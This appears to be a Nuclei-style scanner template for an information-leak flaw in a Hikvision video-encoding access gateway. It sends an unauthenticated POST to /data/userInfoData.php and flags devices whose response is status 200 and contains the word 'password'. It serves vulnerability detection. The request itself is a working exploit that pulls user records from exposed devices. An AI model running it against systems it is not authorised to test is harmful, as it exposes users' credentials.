id: HIKVISION-leakage

info:
  name: 海康威视某视频编码设备接入网关系统存在信息泄漏
  author: Str1am
  severity: high
  tags: HIKVISION,leakage

requests:
  - raw:
      - |
        POST /data/userInfoData.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        page=1&rows=20

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "password"
        part: body
        condition: and